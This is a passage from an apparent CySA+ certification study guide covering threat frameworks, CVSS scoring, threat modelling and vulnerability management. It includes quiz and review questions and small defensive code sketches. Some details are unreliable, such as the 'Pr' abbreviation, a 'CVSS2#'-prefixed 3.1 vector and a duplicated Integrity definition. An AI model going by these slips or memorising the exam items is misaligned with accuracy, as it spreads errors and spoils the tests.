than one of these four self-assessment questions, you might
want to skip ahead to the “Exam Preparation Tasks” section.
Table 2-1 lists the major headings in this chapter and the “Do I
Know This Already?” quiz questions covering the material in
those headings so that you can assess your knowledge of these
specific areas. The answers to the “Do I Know This Already?”
quiz appear in Appendix A.
Table 2-1 “Do I Know This Already?” Foundation Topics
Section-to-Question Mapping

Foundation Topics Section | Question
Attack Frameworks | 1
Threat Research | 2
Threat Modeling Methodologies | 3
Threat Intelligence Sharing with Supported Functions | 4
1. Which of the following is a knowledge base of adversary
tactics and techniques based on real-world observations?
1. Diamond Model
2. OWASP
3. MITRE ATT&CK
4. STIX
2. Which of the following threat intelligence data types is
generated from past activities?
1. Reputational
2. Behavioral
3. Heuristics
4. Anticipatory
3. Your team has identified that a recent breach was sourced
by a disgruntled employee. What part of threat modeling is
being performed by such identification?
1. Total attack surface
2. Impact
3. Adversary capability
4. Attack vector
4. Which of the following functions uses shared threat
intelligence data to build in security for new products and
solutions?
1. Incident response
2. Security engineering
3. Vulnerability management
4. Risk management
FOUNDATION TOPICS
ATTACK FRAMEWORKS
Many organizations have developed security management
frameworks and methodologies to help guide security
professionals. These attack frameworks and methodologies
include security program development standards, enterprise
and security architecture development frameworks, security
control development methods, corporate governance methods,
and process management methods. The following sections
discuss major frameworks and methodologies and explain
where they are used.
MITRE ATT&CK
MITRE ATT&CK is a knowledge base of adversary tactics and
techniques based on real-world observations. It is an open
system, and attack matrices based on it have been created for
various industries. It is designed as a foundation for the
development of specific threat models and methodologies in the
private sector, in government, and in the cybersecurity product
and service community.
An example of such a matrix is the SaaS Matrix created for
organizations utilizing Software as a Service (SaaS), shown in
Table 2-2. The corresponding matrix on the MITRE ATT&CK
website is interactive
(https://attack.mitre.org/matrices/enterprise/cloud/saas/),
and when you click the name of an attack technique in a cell, a
new page opens with a detailed explanation of that attack
technique. For more information about the MITRE ATT&CK
Matrix for Enterprise and to view the matrices it provides for
other platforms (Windows, macOS, etc.), see
https://attack.mitre.org/matrices/enterprise/.
Table 2-2 ATT&CK Matrix for SaaS

Tactic | Techniques
Initial Access | Drive-by Compromise; Spearphishing Link; Trusted Relationship; Valid Accounts
Persistence | Redundant Access; Valid Accounts
Privilege Escalation | Valid Accounts
Defense Evasion | Application Access Token; Redundant Access; Valid Accounts; Web Session Cookie
Credential Access | Brute Force; Steal Application Access Token; Steal Web Session Cookie
Discovery | Cloud Service Discovery
Lateral Movement | Internal Spearphishing; Application Access Token; Web Session Cookie
Collection | Data from Information Repositories
The Diamond Model of Intrusion Analysis
The Diamond Model of Intrusion Analysis emphasizes
the relationships and characteristics of four basic components:
the adversary, capabilities, infrastructure, and victims. The
main axiom of this model states, “For every intrusion event
there exists an adversary taking a step towards an intended goal
by using a capability over infrastructure against a victim to
produce a result.”
Figure 2-1 shows a depiction of the Diamond Model.
Figure 2-1 Diamond Model
The corners of the Diamond Model are defined as follows:
Adversary: The attacker behind the intrusion and the intent of the attack
Capability: Attacker intrusion tools and techniques
Infrastructure: The set of systems an attacker uses to launch
attacks
Victim: A single victim or multiple victims
To access the Diamond Model document see
https://www.activeresponse.org/wp-content/uploads/2013/07/diamond.pdf.
Kill Chain
The cyber kill chain is a cyber intrusion identification and
prevention model developed by Lockheed Martin that describes
the stages of an intrusion. It includes seven steps, as described
in Figure 2-2. For more information, see
https://www.lockheedmartin.com/en-us/capabilities/cyber/cyber-kill-chain.html.
Figure 2-2 Kill Chain
THREAT RESEARCH
As a security professional, sometimes just keeping up with your
day-to-day workload can be exhausting. But performing
ongoing research as part of your regular duties is more
important in today’s world than ever before. You should work
with your organization and direct supervisor to ensure that you
either obtain formal security training on a regular basis or are
given adequate time to maintain and increase your security
knowledge. You should research the current best security
practices, any new security technologies that are coming to
market, any new security systems and services that have
launched, and how security technology has evolved recently.
Threat intelligence is a process that is used to inform decisions
regarding responses to any menace or hazard presented by the
latest attack vectors and actors emerging on the security
horizon. Threat intelligence analyzes evidence-based
knowledge, including context, mechanisms, indicators,
implications, and actionable advice, about an existing or
emerging menace or hazard to assets.
Performing threat intelligence requires generating a certain
amount of raw material for the process. This information
includes data on the latest attacks, knowledge of current
vulnerabilities and threats, specifications on the latest zero-day
mitigation controls and remediation techniques, and
descriptions of the latest threat models. Let’s look at some
issues important to threat research.
Reputational
Some threat intelligence data is generated from past activities.
Reputational scores may be generated for traffic sourced from
certain IP ranges, domain names, and URLs. An example of a
system that uses such reputational scores is the Cisco Talos IP
and Domain Reputation Center. Customers who are
participants in the system enjoy the access to data from all
customers.
As malicious traffic is received by customers, reputational
scores are developed for IP ranges, domain names, and URLs
that serve as sources of the traffic. Based on these scores, traffic
may be blocked from those sources on the customer networks.
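The following minimal Python sketch illustrates this kind of reputation-based blocking decision. The scores, sources, and threshold are invented for illustration and do not come from any real feed.

```python
# A minimal sketch of acting on reputational scores: traffic from any
# source whose score falls below a chosen threshold is blocked. The
# scores, sources, and threshold here are invented for illustration.
REPUTATION = {
    "203.0.113.10": 15,      # poor reputation (documentation-range IP)
    "198.51.100.7": 85,      # well-behaved partner network
}
BLOCK_THRESHOLD = 40

def allow(source_ip: str) -> bool:
    # Unknown sources get a neutral score rather than an automatic block.
    return REPUTATION.get(source_ip, 50) >= BLOCK_THRESHOLD

for ip in ("203.0.113.10", "198.51.100.7", "192.0.2.1"):
    print(ip, "allowed" if allow(ip) else "blocked")
```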
Behavioral
Some threat intelligence data is based not on reputation but on
the behavior of the traffic in question. For example, when the
source in question is repeatedly sending large amounts of traffic
to a single IP address, it indicates a potential DoS attack.
Behavioral analysis is also known as anomaly analysis because
it observes network behaviors for anomalies. It can be
implemented using combinations of the scanning types,
including NetFlow, protocol, and packet analyses, to create a
baseline and subsequently report departures from the traffic
metrics found in the baseline. One of the newer advances in this
field is the development of user and entity behavior analytics
(UEBA). This type of analysis focuses on user activities.
Combining behavior analysis with machine learning, UEBA
enhances the ability to determine which particular users are
behaving oddly. An example would be a hacker who has stolen
credentials of a user and is identified by the system because he
is not performing the same activities that the user would
perform.
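A toy Python sketch of the baseline-and-deviation idea follows: per-interval byte counts are compared against the baseline mean plus a chosen number of standard deviations. All traffic numbers are fabricated.

```python
# A toy sketch of behavioral (anomaly) analysis: build a baseline from
# historical per-interval byte counts, then flag intervals that depart
# from it by more than K standard deviations. All numbers are fabricated.
import statistics

baseline = [1200, 1100, 1350, 1250, 1180, 1300]   # bytes/interval, a "normal" week
mean = statistics.mean(baseline)
stdev = statistics.stdev(baseline)
K = 3  # sensitivity: how many standard deviations count as anomalous

def is_anomalous(observed: float) -> bool:
    return abs(observed - mean) > K * stdev

for sample in (1280, 9800, 1150):
    print(sample, "ANOMALY" if is_anomalous(sample) else "normal")
```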
Heuristics is a method used in malware detection, behavioral
analysis, incident detection, and other scenarios in which
patterns must be detected in the midst of what might appear to
be chaos. It is a process that ranks alternatives using search
algorithms, and although it is not an exact science and is
somewhat a form of “guessing,” it has been shown in many
cases to approximate an exact solution. Heuristics also includes
a process of self-learning through trial and error as it arrives at
the final approximated solution. Many IPS, IDS, and anti-malware
systems that include heuristics capabilities can often
detect so-called zero-day issues using this technique.
Indicator of Compromise (IoC)
An indicator of compromise (IoC) is any activity, artifact,
or log entry that is typically associated with an attack of some
sort. Typical examples include the following:
Virus signatures
Known malicious file types
Domain names of known botnet servers
Known IoCs are exchanged within the security industry, using
the Traffic Light Protocol (TLP) to classify the IoCs. TLP is a set
of designations used to ensure that sensitive information is
shared with the appropriate audience. Somewhat analogous to a
traffic light, it employs four colors to indicate expected sharing
boundaries to be applied by the recipient.
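The following minimal Python sketch shows the basic mechanics of IoC matching: each log event is checked against sets of known-bad domains and file hashes. The indicator values and events are placeholders, not real intelligence.

```python
# A minimal sketch of IoC matching: each log event is checked against
# sets of known-bad indicators. The domains, hashes, and events below
# are placeholders, not real intelligence.
BAD_DOMAINS = {"c2.example.net", "bot.example.org"}
BAD_HASHES = {"44d88612fea8a8f36de82e1278abb02f"}  # placeholder MD5 value

events = [
    {"host": "pc-17", "dns_query": "c2.example.net", "file_md5": None},
    {"host": "pc-09", "dns_query": "www.example.com",
     "file_md5": "44d88612fea8a8f36de82e1278abb02f"},
]

for ev in events:
    hits = []
    if ev["dns_query"] in BAD_DOMAINS:
        hits.append(f'malicious domain {ev["dns_query"]}')
    if ev["file_md5"] in BAD_HASHES:
        hits.append(f'malicious file hash {ev["file_md5"]}')
    if hits:
        print(ev["host"], "IoC match:", "; ".join(hits))
```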
Common Vulnerability Scoring System (CVSS)
The Common Vulnerability Scoring System (CVSS)
version 3.1 is a system of ranking vulnerabilities that are
discovered based on predefined metrics. This system ensures
that the most critical vulnerabilities can be easily identified and
addressed after a vulnerability test is completed. Most commercial
vulnerability management tools use CVSS scores as a baseline.
Scores are awarded on a scale of 0 to 10, with the values having
the following ranks:
0: No issues
0.1 to 3.9: Low
4.0 to 6.9: Medium
7.0 to 8.9: High
9.0 to 10.0: Critical

Note
The Forum of Incident Response and Security Teams (FIRST) is the custodian
of CVSS 3.1.
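As a small illustration, the following Python sketch maps a CVSS base score to the qualitative severity ranks listed above.

```python
# A small sketch mapping a CVSS v3.1 base score (0.0-10.0) to the
# qualitative severity ranks listed above.
def cvss_severity(score: float) -> str:
    if score == 0.0:
        return "None"
    if score <= 3.9:
        return "Low"
    if score <= 6.9:
        return "Medium"
    if score <= 8.9:
        return "High"
    return "Critical"

for s in (0.0, 3.1, 5.0, 7.5, 9.8):
    print(s, cvss_severity(s))
```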
CVSS is composed of three metric groups:
Base: Characteristics of a vulnerability that are constant over time
and user environments
Temporal: Characteristics of a vulnerability that change over time
but not among user environments
Environmental: Characteristics of a vulnerability that are
relevant and unique to a particular user’s environment
The Base metric group includes the following metrics:
Attack Vector (AV): Describes how the attacker would exploit
the vulnerability and has four possible values:
L: Stands for Local and means that the attacker must have
physical or logical access to the affected system
A: Stands for Adjacent network and means that the attacker
must be on the local network
N: Stands for Network and means that the attacker can cause the
vulnerability from any network
P: Stands for Physical and requires the attacker to physically
touch or manipulate the vulnerable component
Attack Complexity (AC): Describes the difficulty of exploiting
the vulnerability and has two possible values:
H: Stands for High and means that the vulnerability requires
special conditions that are hard to find
L: Stands for Low and means that the vulnerability does not
require special conditions
Privileges Required (Pr): Describes the authentication an
attacker would need to get through to exploit the vulnerability and
has three possible values:
H: Stands for High and means the attacker requires privileges
that provide significant (e.g., administrative) control over the
vulnerable component allowing access to component-wide
settings and files
L: Stands for Low and means the attacker requires privileges
that provide basic user capabilities that could normally affect
only settings and files owned by a user
N: Stands for None and means that no authentication
mechanisms are in place to stop the exploit of the vulnerability
User Interaction (UI): Captures the requirement for a human
user, other than the attacker, to participate in the successful
compromise of the vulnerable component.
N: Stands for None and means the vulnerable system can be
exploited without interaction from any user
R: Stands for Required and means successful exploitation of this
vulnerability requires a user to take some action before the
vulnerability can be exploited
Scope (S): Captures whether a vulnerability in one vulnerable
component impacts resources in components beyond its security
scope.
U: Stands for Unchanged and means the exploited vulnerability
can only affect resources managed by the same security authority
C: Stands for Changed and means that the exploited
vulnerability can affect resources beyond the security scope
managed by the security authority of the vulnerable component
The impact metrics, which are also part of the Base metric group, include the following:
Availability (A): Describes the disruption that might occur if the
vulnerability is exploited and has three possible values:
N: Stands for None and means that there is no availability
impact
L: Stands for Low and means that system performance is
degraded
H: Stands for High and means that the system is completely shut
down
Confidentiality (C): Describes the information disclosure that
may occur if the vulnerability is exploited and has three possible
values:
N: Stands for None and means that there is no confidentiality
impact
L: Stands for Low and means some access to information would
occur
H: Stands for High and means all information on the system
could be compromised
Integrity (I): Describes the type of data alteration that might
occur and has three possible values:
N: Stands for None and means that there is no integrity impact
L: Stands for Low and means some information modification
would occur
H: Stands for High and means all information on the system
could be compromised
The CVSS vector looks something like this:
CVSS:3.1/AV:L/AC:H/Pr:L/UI:R/S:U/C:L/I:N/A:N
This vector is read as follows:
AV:L: Attack vector, where L stands for Local and means that the
attacker must have physical or logical access to the affected system
AC:H: Attack complexity, where H stands for High and
means that the vulnerability requires special conditions that are
hard to find
Pr:L: Privileges Required, where L stands for Low and means the
attacker requires privileges that provide basic user capabilities that
could normally affect only settings and files owned by a user
UI:R: User Interaction, where R stands for Required and means
successful exploitation of this vulnerability requires a user to take
some action before the vulnerability can be exploited
S:U: Scope, where U stands for Unchanged and means the
exploited vulnerability can only affect resources managed by the
same security authority
C:L: Confidentiality, where L stands for Low and means that some
access to information would occur
I:N: Integrity, where N stands for None and means that there is no
integrity impact
A:N: Availability, where N stands for None and means that there is
no availability impact
For more information, see https://www.first.org/cvss/v31/cvss-v31-specification_r1.pdf.
Note
For access to CVVS calculators, see the following resources:
CVSS Scoring System Calculator: https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?calculator&adv&version=2
CVSS Version 3.1 Calculator: https://www.first.org/cvss/calculator/3.1
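As a quick illustration of how such a vector can be consumed programmatically, here is a minimal Python sketch that splits a v3.1-style vector string into its metric/value pairs and expands them using the metric names described earlier.

```python
# A minimal sketch that parses a CVSS v3.1-style vector string into its
# metric/value pairs and expands them for readability.
NAMES = {
    "AV": "Attack Vector", "AC": "Attack Complexity",
    "Pr": "Privileges Required", "UI": "User Interaction",
    "S": "Scope", "C": "Confidentiality", "I": "Integrity",
    "A": "Availability",
}

def parse_vector(vector: str) -> dict:
    metrics = {}
    for token in vector.split("/"):
        key, _, value = token.partition(":")
        if key in NAMES:              # skip the leading "CVSS:3.1" label
            metrics[key] = value
    return metrics

vec = "CVSS:3.1/AV:L/AC:H/Pr:L/UI:R/S:U/C:L/I:N/A:N"
for key, value in parse_vector(vec).items():
    print(f"{NAMES[key]} ({key}) = {value}")
```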
THREAT MODELING METHODOLOGIES
An organization should have a well-defined risk
management process in place that includes the evaluation of
risk that is present. When this process is carried out properly, a
threat modeling methodology allows organizations to
identify threats and potential attacks and implement the
appropriate mitigations against these threats and attacks. These
facets ensure that security controls that are implemented are in
balance with the operations of the organization. There are a
number of factors to consider in a threat modeling methodology
that are covered in the following sections.
Adversary Capability
First, you must have a grasp of the capabilities of the attacker.
Threat actors have widely varying capabilities. When carrying
out threat modeling, you may decide to develop a more
comprehensive list of threat actors to help in scenario
development.
Security professionals should analyze all the threats to identify
all the actors who pose significant threats to the organization.
Examples of the threat actors include both internal and external
actors and include the following:
Internal actors:
Reckless employee
Untrained employee
Partner
Disgruntled employee
Internal spy
Government spy
Vendor
Thief
External actors:
Anarchist
Competitor
Corrupt government official
Data miner
Government cyber warrior
Irrational individual
Legal adversary
Mobster
Activist
Terrorist
Vandal
These actors can be subdivided into two categories: non-hostile
and hostile. In the preceding lists, three actors are usually
considered non-hostile: reckless employee, untrained employee,
and partner. All the other actors should be considered hostile.
The organization would then need to analyze each of these
threat actors according to set criteria. All threat actors should be
given a ranking to help determine which threat actors need to
be analyzed. Examples of some of the most commonly used
criteria include the following:
Skill level: None, minimal, operational, adept
Resources: Individual, team, organization, government
Limits: Code of conduct, legal, extra-legal (minor), extra-legal
(major)
Visibility: Overt, covert, clandestine, don’t care
Objective: Copy, destroy, injure, take, don’t care
Outcome: Acquisition/theft, business advantage, damage,
embarrassment, technical advantage
With these criteria, the organization must then determine which
of the actors it wants to analyze. For example, the organization
may choose to analyze all hostile actors that have a skill level of
adept, resources of an organization or government, and limits of
extra-legal (minor) or extra-legal (major). Then the list is
consolidated to include only the threat actors that fit all of these
criteria.
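The consolidation step can be pictured with the following minimal Python sketch, which keeps only the hostile actors matching the example criteria just described. The actor records are illustrative.

```python
# A small sketch of consolidating a threat actor list: keep only hostile
# actors whose skill, resources, and limits meet the chosen criteria.
# The actor records below are illustrative.
actors = [
    {"name": "Government cyber warrior", "hostile": True,
     "skill": "adept", "resources": "government", "limits": "extra-legal (major)"},
    {"name": "Mobster", "hostile": True,
     "skill": "adept", "resources": "organization", "limits": "extra-legal (major)"},
    {"name": "Untrained employee", "hostile": False,
     "skill": "minimal", "resources": "individual", "limits": "legal"},
]

selected = [
    a for a in actors
    if a["hostile"]
    and a["skill"] == "adept"
    and a["resources"] in ("organization", "government")
    and a["limits"] in ("extra-legal (minor)", "extra-legal (major)")
]
print([a["name"] for a in selected])
```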
Total Attack Surface
The total attack surface comprises all the points at which
vulnerabilities exist. It is critical that the organization have a
clear understanding of the total attack surface. Otherwise, it is
somewhat like locking all the doors of which one is aware while
several doors exist of which one is not aware. The result is
unlocked doors.
Identifying the attack surface should be a formalized process
that arrives at a complete list of vulnerabilities. Only then can
each vulnerability be addressed properly with security controls,
processes, and procedures.
To identify the potential attacks that could occur, an
organization must create scenarios so that each potential attack
can be fully analyzed. For example, an organization may decide
to analyze a situation in which a hacktivist group performs
prolonged denial-of-service attacks, causing sustained outages
intended to damage the organization’s reputation. The
organization then must make a risk determination for each
scenario.
Once all the scenarios are determined, the organization
develops an attack tree for each potential attack. Such an attack
tree includes all the steps and/or conditions that must occur for
the attack to be successful. The organization then maps security
controls to the attack trees.
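One simple way to represent an attack tree for analysis is as nested data. In the following minimal Python sketch, the scenario and controls are illustrative assumptions; the check flags any attack step that no mapped control disrupts:

attack_tree = {
    "goal": "Sustained denial of service",
    "steps": [
        {"step": "Recruit botnet", "controls": []},
        {"step": "Flood public web tier",
         "controls": ["rate limiting", "upstream scrubbing service"]},
        {"step": "Exhaust server resources",
         "controls": ["autoscaling", "connection timeouts"]},
    ],
}

# Flag any step of the attack that no control currently disrupts.
for node in attack_tree["steps"]:
    if not node["controls"]:
        print(f"Uncovered step: {node['step']}")  # Recruit botnet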
To determine the security controls that can be used, the
organization would need to look at industry standards,
including NIST SP 800-53 (revision 4 at the time of writing).
Finally, the organization would map controls back into the
attack tree to ensure that controls are implemented at as many
levels of the attack surface as possible.
Note
For more information on NIST SP 800-53, see
https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-53r4.pdf.
Attack Vector
An attack vector is the path or means with which the attack is
carried out. Some examples of attack vectors include the
following:
Phishing
Malware
Exploitation of unpatched vulnerabilities
Code injection
Social engineering
Advanced persistent threats (APTs)
Once attack vectors and attack agents have been identified, the
organization must assess the relative impact and likelihood of
such attacks. This allows the organization to prioritize the
limited resources available to address the vulnerabilities.
Impact
Once all assets have been identified and their value to the
organization has been established, the organization must
identify the impact to each asset: the harm to the organization
should that asset be compromised.
While both quantitative and qualitative risk assessments may be
performed, when a qualitative assessment is conducted, the
risks are placed into the following categories:
High
Medium
Low
Typically a risk assessment matrix is created, such as the one
shown in Figure 2-3. Subject matter experts grade all risks on
their likelihood and their impact. This helps to prioritize the
application of resources to the most critical vulnerabilities.
Figure 2-3 Risk Assessment Matrix
Once the organization determines what it really cares about
protecting, the organization should then select the scenarios
that could have a catastrophic impact on the organization by
using the objective and outcome values from the adversary
capability analysis and the asset value and business impact
information from the impact analysis.
Probability
When performing the assessment mentioned in the previous
section, the organization must also consider the probability that
each security event occurs; note in Figure 2-3 that one axis of
the risk matrix is impact and the other is probability.
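The matrix lookup itself is straightforward to express in code. The following minimal Python sketch assumes an illustrative assignment of the High/Medium/Low cells; an actual matrix such as the one in Figure 2-3 would supply the authoritative values.

MATRIX = {
    ("High", "High"): "High",       ("High", "Medium"): "High",
    ("High", "Low"): "Medium",      ("Medium", "High"): "High",
    ("Medium", "Medium"): "Medium", ("Medium", "Low"): "Low",
    ("Low", "High"): "Medium",      ("Low", "Medium"): "Low",
    ("Low", "Low"): "Low",
}

def risk_rating(impact: str, probability: str) -> str:
    """Look up the qualitative risk level for an impact/probability pair."""
    return MATRIX[(impact, probability)]

print(risk_rating("High", "Low"))  # Medium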
THREAT INTELLIGENCE SHARING WITH
SUPPORTED FUNCTIONS
Earlier we looked at the importance of sharing intelligence
information with other organizations. It is also critical that such
information be shared with all departments that perform
various security functions. Although an organization might not
have a separate group for each of the areas covered in the
sections that follow, security professionals should ensure that
the latest threat data is made available to all functional units
that participate in these activities.
Incident Response
Incident response will be covered more completely in
Chapter 15, “The Incident Response Process,” but here it is
important to point out that properly responding to security
incidents requires knowledge of what may be occurring, and
that requires a knowledge of the very latest threats and how
those threats are realized. Therefore, members who are trained
in the incident response process should also be kept up to date
on the latest threat vectors by giving them access to all threat
intelligence that has been collected through any sharing
arrangements.
Vulnerability Management
Vulnerability management will be covered in Chapter 5,
“Threats and Vulnerabilities Associated with Specialized Technology,” and
Chapter 6, “Threats and Vulnerabilities Associated with
Operating in the Cloud,” but here it is important to point out
that no function depends more heavily on shared
intelligence information than vulnerability management. When
sharing platforms and protocols are used to identify new
threats, this data must be shared in a timely manner with those
managing vulnerabilities.
Risk Management
Risk management will be addressed in Chapter 20, “Applying
Security Concepts in Support of Organizational Risk
Mitigation.” It is a formal process that rates identified
vulnerabilities by the likelihood of their compromise and the
impact of said compromise. Because this process is based on
complete and thorough vulnerability identification, speedy
sharing of any new threat intelligence is critical to the
vulnerability management process on which risk management
depends.
Security Engineering
Security engineering is the process of architecting security
features into the design of a system or set of systems. It has as
its goal an emphasis on security from the ground up, sometimes
stated as “building in security.” Unless the very latest threats are
shared with this function, engineers cannot be expected to build
in features that prevent threats from being realized.
Detection and Monitoring
Finally, those who are responsible for monitoring and detecting
attacks also benefit greatly from timely sharing of threat
intelligence data. Without this, indicators of compromise
cannot be developed and utilized to identify the new threats in
time to stop them from causing breaches.
EXAM PREPARATION TASKS
As mentioned in the section “How to Use This Book” in the
Introduction, you have several choices for exam preparation:
the exercises here, Chapter 22, “Final Preparation,” and the
exam simulation questions in the Pearson Test Prep Software
Online.
REVIEW ALL KEY TOPICS
Review the most important topics in this chapter, noted with
the Key Topics icon in the outer margin of the page. Table 2-3
lists a reference of these key topics and the page number on
which each is found.
Table 2-3 Key Topics in Chapter 2

Key Topic Element   Description                        Page Number
Section             Diamond Model                      22
Figure 2-2          Kill chain                         23
Bulleted list       Example indicators of compromise   25
Bulleted list       CVSS metric groups                 26
Bulleted list       Base metric group metrics          26
Bulleted list       CVSS vector readings               28
Bulleted list       Threat actors                      29
Bulleted list       Example attack vectors             31
Figure 2-3          Risk assessment matrix             32
DEFINE KEY TERMS
Define the following key terms from this chapter and check your
answers in the glossary:
attack frameworks
MITRE ATT&CK
Diamond Model of Intrusion Analysis
adversary
capability
infrastructure
victim
kill chain
heuristics
indicator of compromise (IoC)
Common Vulnerability Scoring System (CVSS)
Attack Vector (AV)
Attack Complexity (AC)
Privileges Required (Pr)
Availability (A)
Confidentiality (C)
Integrity (I)
risk management
threat modeling methodology
total attack surface
incident response
threat intelligence
vulnerability management
security engineering
REVIEW QUESTIONS
1. Match each corner of the Diamond Model with its
description.
Corner           Description
Adversary        Describes attacker intrusion tools and techniques
Victim           Describes the target or targets
Capability       Describes the set of systems an attacker uses to launch attacks
Infrastructure   Describes the intent of the attack
2. The _______________ corner of the Diamond Model
focuses on the intent of the attack.
3. What type of threat data describes a source that repeatedly
sends large amounts of traffic to a single IP address?
4. _________________ is any activity, artifact, or log entry
that is typically associated with an attack of some sort.
5. Give at least two examples of an IoC.
6. Match each acronym with its description.

Acronym        Description
TLP            System of ranking vulnerabilities that are discovered based on predefined metrics
MITRE ATT&CK   Any activity, artifact, or log entry that is typically associated with an attack of some sort
CVSS           Knowledge base of adversary tactics and techniques based on real-world observations
IoC            Set of designations used to ensure that sensitive information is shared with the appropriate audience
7. In the following CVSS vector, what does the Pr:L designate?
CVSS2#AV:L/AC:H/Pr:L/UI:R/S:U/C:L/I:N/A:N
8. The _________________ CVSS metric group describes
characteristics of a vulnerability that are constant over time
and user environments.
9. The ____________ CVSS base metric describes how the
attacker would exploit the vulnerability.
10. Match each CVSS attack vector value with its description.
Value   Description
P       Means the attack requires the attacker to physically touch or manipulate the vulnerable component
L       Means that the attacker can cause the vulnerability from any network
N       Means that the attacker must be on the local network
A       Means that the attacker must have physical or logical access to the affected system
Chapter 3
Vulnerability Management Activities
This chapter covers the following topics related to Objective 1.3
(Given a scenario, perform vulnerability management activities)
of the CompTIA Cybersecurity Analyst (CySA+) CS0-002
certification exam:
Vulnerability identification: Explores asset criticality, active vs.
passive scanning, and mapping/enumeration.
Validation: Covers true positive, false positive, true negative, and
false negative alerts.
Remediation/mitigation: Describes configuration baseline,
patching, hardening, compensating controls, risk acceptance, and
verification of mitigation.
Scanning parameters and criteria: Explains risks associated
with scanning activities, vulnerability feed, scope, credentialed vs.
non-credentialed scans, server-based vs. agent-based scans,
internal vs. external scans, and special considerations including
types of data, technical constraints, workflow, sensitivity levels,
regulatory requirements, segmentation, intrusion prevention
system (IPS), intrusion detection system (IDS), and firewall
settings.
Inhibitors to remediation: Covers memorandum of
understanding (MOU), service-level agreement (SLA),
organizational governance, business process interruption,
degrading functionality, legacy systems, and proprietary systems.
Managing vulnerabilities requires more than a casual approach.
There are certain processes and activities that should occur to
ensure that your management of vulnerabilities is as robust as it
can be. This chapter describes the activities that should be
performed to manage vulnerabilities.
“DO I KNOW THIS ALREADY?” QUIZ
The “Do I Know This Already?” quiz enables you to assess
whether you should read the entire chapter. If you miss no more
than one of these five self-assessment questions, you might
want to move ahead to the “Exam Preparation Tasks” section.
Table 3-1 lists the major headings in this chapter and the “Do I
Know This Already?” quiz questions covering the material in
those headings so you that can assess your knowledge of these
specific areas. The answers to the “Do I Know This Already?”
quiz appear in Appendix A.
Table 3-1 “Do I Know This Already?” Foundation Topics
Section-to-Question Mapping

Foundation Topics Section           Question
Vulnerability Identification        1
Validation                          2
Remediation/Mitigation              3
Scanning Parameters and Criteria    4
Inhibitors to Remediation           5
1. Which of the following helps to identify the number and type
of resources that should be devoted to a security issue?
a. Specific threats that are applicable to the component
b. Mitigation strategies that could be used
c. The relative value of the information that could be discovered
d. The organizational culture
2. Which of the following occurs when the scanner correctly
identifies a vulnerability?
a. True positive
b. False positive
c. False negative
d. True negative
3. Which of the following is the first step of the patch
management process?
a. Determine the priority of the patches
b. Install the patches
c. Test the patches
d. Ensure that the patches work properly
4. Which of the following is not a risk associated with scanning
activities?
a. False sense of security can be introduced
b. Does not itself reduce your risk
c. Only as valid as the latest scanner update
d. Distracts from day-to-day operations
5. Which of the following is a document that, while not legally
binding, indicates a general agreement between the
principals to do something together?
a. SLA
b. MOU
c. ICA
d. SCA
FOUNDATION TOPICS
VULNERABILITY IDENTIFICATION
Vulnerabilities must be identified before they can be mitigated
by applying security controls or countermeasures. Vulnerability
identification is typically done through a formal process called a
vulnerability assessment, which works hand in hand with
another process called risk management. The vulnerability
assessment identifies and assesses the vulnerabilities, and the
risk management process goes a step further and identifies the
assets at risk and assigns a risk value (derived from both the
impact and likelihood) to each asset.
Regardless of the components under study (network,
application, database, etc.), any vulnerability assessment’s goal
is to highlight issues before someone either purposefully or
inadvertently leverages the issue to compromise the component.
The design of the assessment process has a great impact on its
success. Before an assessment process is developed, the
following goals of the assessment need to be identified:
The relative value of the information that could be
discovered through the compromise of the components
under assessment: This helps to identify the number and type of
resources that should be devoted to the issue.
The specific threats that are applicable to the component:
For example, a web application would not be exposed to the same
issues as a firewall because their operation and positions in the
network differ.
The mitigation strategies that could be deployed to
address issues that might be found: Identifying common
strategies can suggest issues that weren’t anticipated initially. For
example, if you were doing a vulnerability test of your standard
network operating system image, you should anticipate issues you
might find and identify what technique you will use to address each.
A security analyst who will be performing a vulnerability
assessment needs to understand the systems and devices that
are on the network and the jobs they perform. Having this
knowledge will ensure that the analyst can assess the
vulnerabilities of the systems and devices based on the known
and potential threats to the systems and devices.
After gaining knowledge regarding the systems and devices, a
security analyst should examine existing controls in place and
identify any threats against those controls. The security analyst
then uses all the information gathered to determine which
automated tools to use to analyze for vulnerabilities. After the
vulnerability analysis is complete, the security analyst should
verify the results to ensure that they are accurate and then
report the findings to management, with suggestions for
remedial action. With this information in hand, the threat
analyst should carry out threat modeling to identify the threats
that could negatively affect systems and devices and the attack
methods that could be used.
In some situations, a vulnerability management system may be
indicated. A vulnerability management system is software that
centralizes and, to a certain extent, automates the process of
continually monitoring and testing the network for
vulnerabilities. Such a system can scan the network for
vulnerabilities, report them, and, in many cases, remediate the
problem without human intervention. While a vulnerability
management system is a valuable tool to have, these systems,
regardless of how sophisticated they may be, cannot take the
place of vulnerability and penetration testing performed by
trained professionals.
Keep in mind that after a vulnerability assessment is complete,
its findings are only a snapshot in time. Even if no
vulnerabilities are found, the best statement to describe the
situation is “there are no known vulnerabilities at this time.” It
is impossible to say with certainty that a vulnerability will not
be discovered in the near future.
Asset Criticality
Assets should be classified based on their value to the
organization and their sensitivity to disclosure. Assigning a
value to data and assets enables an organization to determine
the resources that should be used to protect them. Resources
that are used to protect data include personnel resources,
monetary resources, access control resources, and so on.
Classifying assets enables you to apply different protective
measures. Asset classification is critical to all systems to protect
the confidentiality, integrity, and availability (CIA) of the asset.
After assets are classified, they can be segmented based on the
level of protection needed. The classification levels ensure that
assets are protected in the most cost-effective manner possible.
The assets could then be configured to ensure they are isolated
or protected based on these classification levels. An
organization should determine the classification levels it uses
based on the needs of the organization. A number of private-sector
classifications and military and government information
classifications are commonly used.
The information life cycle should also be based on the
classification of the assets. In the case of data assets,
organizations are required to retain certain information,
particularly financial data, based on local, state, or government
laws and regulations.
Sensitivity is a measure of how freely data can be handled. Data
sensitivity is one factor in determining asset criticality. For
example, a particular server stores highly sensitive data and
therefore needs to be identified as a high criticality asset. Some
data requires special care and handling, especially when
inappropriate handling could result in penalties, identity theft,
financial loss, invasion of privacy, or unauthorized access by an
individual or many individuals. Some data is also subject to
regulation by state or federal laws that require notification in
the event of a disclosure. Data is assigned a level of sensitivity
based on who should have access to it and how much harm
would be done if it were disclosed. This assignment of
sensitivity is called data classification. Criticality is a measure of
the importance of the data. Data that is considered sensitive
might not necessarily be considered critical. Assigning a level of
criticality to a particular data set requires considering the
answers to a few questions:
Will you be able to recover the data in case of disaster?
How long will it take to recover the data?
What is the effect of this downtime, including loss of public
standing?
Data is considered essential when it is critical to the
